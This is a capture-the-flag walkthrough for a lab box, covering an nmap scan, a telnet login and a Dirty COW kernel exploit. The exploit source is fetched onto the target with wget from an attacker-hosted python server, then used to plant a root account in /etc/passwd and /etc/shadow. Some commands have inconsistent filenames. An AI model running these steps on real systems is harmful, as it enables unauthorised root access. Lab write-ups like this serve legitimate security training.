The first thing we will need to do after deploying our target is to scan it. I am going to use Nmap to scan the target.
nmap -p- -sV -T4 –reason 10.10.82.235
-p- is to scan all ports
-sV is to scan for the services on the open ports
-T4 is how fast you want to scan. T5 is the fastest, but can sometimes produce false positives.
–reason Will tell you why Nmap thinks a port is open or filtered.
Our first question asks us what old, deprecated protocol and service is running. This is the telnet port 23. When logging in via telnet, the username and password are sent in cleartext. That means anyone who is sniffing the network traffic could see the username and password. Then they could use this to log into the telnet server.
Now let’s try to login to the telnet port. If you don’t have telnet installed run sudo apt-get install telnet.
telnet 10.10.82.235 23
Wow someone left us cookies and milk in the form of a username and password! Let’s login to the telnet server.
We even get a shell now! Go ahead and answer the question about the credential.
Now we need to figure out what distribution of Linux we have logged into. We can use the command cat /etc/*release to get the information we need. You can use the DISTRIB_ID and DISTRIB_RELEASE as the answer.
Now let’s check out the cookies and milk file. It gives us the answer to the next question at the top.
cat cookies_and_milk.txt
The next part talks about using the dirtycow exploit, so let’s grab the source code and copy it over to our target.
nano exploit.c
Now past the code from here, be sure to remove the ###dirtyc0w.c### line. Otherwise this won’t compile correctly.
https://github.com/dirtycow/dirtycow.github.io/blob/master/dirtyc0w.c
Now save it and download it onto the target machine. Serve up a python server on your attacker machine using
python3 -m http.server 7777
Now on our target machine we logged into we can use wget to grab the file.
wget http://10.6.43.108:7777/DirtyCow.c
Now we need to compile the exploit. Now when we look at the exploit code, we see instructions about how to compile and run the code.
Running the exploit shows you need to give it the option of a target_file and new_Content for that file. We can make our own hacker user. Then we can make our own password being hashed with Md5 in the /etc/shadow file for the hacker user.
First let’s choose a super awesome password.
SuperAwesomeSecretPassword
Now we need to create the hash, we can use openssl for this on the target machine.
openssl passwd -1
Now type your password and then verify it
SuperAwesomeSecretPassword
The /etc/shadow file has a specific format.
Let’s create this line for our hacker user.
nano shadow
hacker:$1$ycKKl9ef@jyRAd.w0bXOpzTQTDM9///:1:1:5:3:2:9999:7:::
This is the same from the password we got from openssl.
Save that and let’s make a new passwd file.
Take this picture as an example
nano passwd
hacker:x:99:0:hacker:/root:/bin/bash
99 is the User ID, just to make sure we don’t conflict with any other account
0 is for the root group
hacker is our user description. Don’t do this on real engagements!
/root is the home directory for this user
/bin/bash is the shell we want to give the user.
Our 2 files should look like this. Now we can run the exploit.
After running the exploit, the files were not modified. So we need a new dirtycow exploit.
This one claims to make a new user called firefart with either no password or a password of your choosing. Let’s change the username to hacker.
https://github.com/FireFart/dirtycow/blob/master/dirty.c
On line 131 change the username to hacker.
user.username = “hacker”;
Now save it as NewDirtyCow.c and transfer it to the victim machine.
python3 -m http.server 7777
Now on our target machine we logged into we can use wget to grab the file.
wget http://10.6.43.108:7777/NewDirtyCow.c
Let’s compile it. From the directions it says to run
gcc -pthread NewDirtyCow.c -o NewDirtyCow -lcrypt
The above command is an answer to our question, but we need to just call it dirty.
gcc -pthread dirty.c -o dirty -lcrypt
It also wants to know the original user that would have been created from this code (https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c)
The answer is FireFart
Now run it using
./NewDirtyCown
Give it a password of Hacker. We now have a root user. Notice when we su to hacker, we have a # showing we are a root user!
We can see our user in the /etc/passwd. Some of the things I tried earlier seems to have messed up sudo for us, but we are a root user at this point.
We still don’t have the flag though, so let’s cd into /root
There is a message from the grinch in there. Cat out the file.
Now we need to create a file called coal in the directory and finally pipe the output of tree into md5sum
touch coal
tree | md5sum
Another day down!!!